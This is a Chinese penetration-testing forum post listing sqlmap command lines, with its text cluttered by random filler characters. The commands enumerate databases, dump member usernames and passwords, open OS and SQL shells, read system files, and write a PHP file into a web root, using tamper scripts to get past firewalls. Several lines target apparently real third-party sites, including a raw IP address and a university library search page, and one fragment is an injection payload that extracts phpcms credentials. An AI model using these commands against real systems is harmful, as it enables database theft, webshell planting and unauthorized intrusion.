中国网络渗透测试联盟

标题: sqlmap使用实例 [打印本页]

作者: admin    时间: 2017-5-19 17:03
标题: sqlmap使用实例
/pentest/database/sqlmap% B6 o5 l) @+ I. p; ]6 V5 d$ w
1 l3 _7 ^9 ~% p) l8 J* t% A
update :::::>     in the folder   after  execute    following   order : svn update$ W5 g' W  Z0 y$ M

* r- v3 {, g0 i# b; \1 i# V1 r5 }sqlmap.py -r 1.txt --current-db
9 H; v! _) p8 Q
4 v# `1 [1 }0 uv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”$ r- c2 R0 ~/ N* I. T

# M& l5 C' Z" }3 c==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
" J3 u! O5 z  f* J猜解数据库& l' E) a" Z( t8 S8 L
./sqlmap.py -u "injection-url" --dbs
3 C5 x* X& T5 M4 Q  K" O& esqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
0 f: c9 Z5 m2 R' ]3 ?
+ d, \! F) W1 D& J" ?" h猜解表名. {: ~% z. b; J
./sqlmap.py -u "injection-url" -D database_name --tables( Y# c1 }. X9 H% K- f

  W  |3 P+ n# A5 v8 usqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py". o/ \  ?( a  j
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" - T& \* B* L$ y- s- {

9 [7 O1 o3 q5 ]# Isqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
1 u6 R; [; f( ~& _& m/ W! ^  Y; ?! R
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
. O3 x# h7 I/ |9 |+ x8 G" Asqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"- n- N# @/ [$ J0 @
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" ' }8 s$ |! _; l& Z# S5 o
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
/ Z$ w+ [5 P5 A: i; t7 Z+ v' |/ K
1 j+ N- m) N$ D: wsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"  B2 ^: i+ B0 u9 N$ T
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
' j, H, `- Z+ X- i, _5 s2 ^3 M* D" esqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
9 T, V1 m& K0 k) M/ Psqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
; S0 a  H% `( Q1 @# J5 bsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump7 y" K; I& d. {, |
+ \4 h* o* g0 b4 [% D$ b+ T( k
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了7 A& C& J! J! y3 R% D
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"2 t4 m* O0 w% I% j7 e! [/ m: q

' o. g( t* b1 H* Jsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"* k7 B: r+ Q8 @. s  D
猜解列名
& x, E3 y* s8 r# ]* Y; B./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
  P3 G0 ?% a! t9 U# J5 I9 O) ]$ d, i. K! U7 g: A7 n, M
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
0 b3 Z+ v3 V& Y: ~7 Ysqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
6 Q9 b' }3 c5 D. k/ W6 u" msqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"1 x) w# g9 F$ `0 O% M  x

9 x" b8 q* Z8 {9 `: Qsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
& n; y- B; S0 N1 V&submit=Go/ Z& j6 X5 A" B! c
猜解值
3 x1 U/ {5 H. I4 w: c5 }./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
& F4 C! f* K+ n3 o/ d========================================================
1 l: v! x" P  K' S! Q搜索表名中包括mana字符的! B3 J# t# j7 n/ p
/sqlmap.py -u "injection-url" -T mana --search" Z1 a/ T. N. N2 U' e
返回一个交互式sql shell
# T( y6 W, L  p% l! C: J. s/sqlmap.py -u "injection-url" --sql-shell
; t* T; y+ `5 c. Y+ _" g5 L* c, g2 e读取指定文件(需权限)
3 w0 Q) Q4 I4 g' ?! K/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
* i( u$ ~+ J7 L3 m# n6 Q查看当前 用户 及 数据库
9 W) I9 G" @9 D7 @* g/sqlmap.py -u "injection-url" --current-user --current-db
) Z- U/ A. X; Q& _/ i3 h; E本地文件 写入 远程目标绝对路径
" [3 D( E( z$ v+ u/ P) u+ }/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
* X& C3 z8 u" J7 f* r: H$ c  l8 ^sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" 5 }8 D$ d0 m3 q% y; J

- q% {; u9 f  E7 G6 O4 psqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径  }3 l" O3 b) M( d
查看某用的权限
% h! S. W7 D6 S4 {8 \9 }/sqlmap.py -u "injection-url" --privileges -U root
9 j0 i! s8 u- M1 \' x查看当前用户是否为dba
1 q, C( }3 {6 f: M' Q$ m' |/sqlmap.py -u "injection-url" --is-dba" v2 v7 f% b$ s3 m8 w
读取所有数据库用户或指定数据库用户的密码
/ a7 T: \0 \; a% _, T% ?sqlmap.py -r 1.txt --users --passwords! {6 d: v! r7 N. h
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" 1 ^. I4 s# `6 V( G* c

3 R( ?+ n5 X) y. `$ \+ r/sqlmap.py -u "injection-url" --passwords -U root6 n# J+ G; c3 Q5 K; Y
6 T4 C, ^/ d; `3 P
--start&&--stop 与 --first&&--last 的区别$ B# ^# X4 L; {+ \
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
8 V7 ^5 [* f+ U: b) q: i" s7 {1 \% Q9 W  ^; {: a0 k
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt), [" Q8 V  w0 w" o( l
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
, Y# [5 H; z2 l" P; U8 L/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
9 T1 }4 A( P$ m* }* S
; ]0 B+ P+ x, p执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)0 u+ ?2 ^& w1 Y: _3 s
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
" F1 z% ~- y9 S3 z7 f4 p& ?: g. G3 L, }" E  ^0 H





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2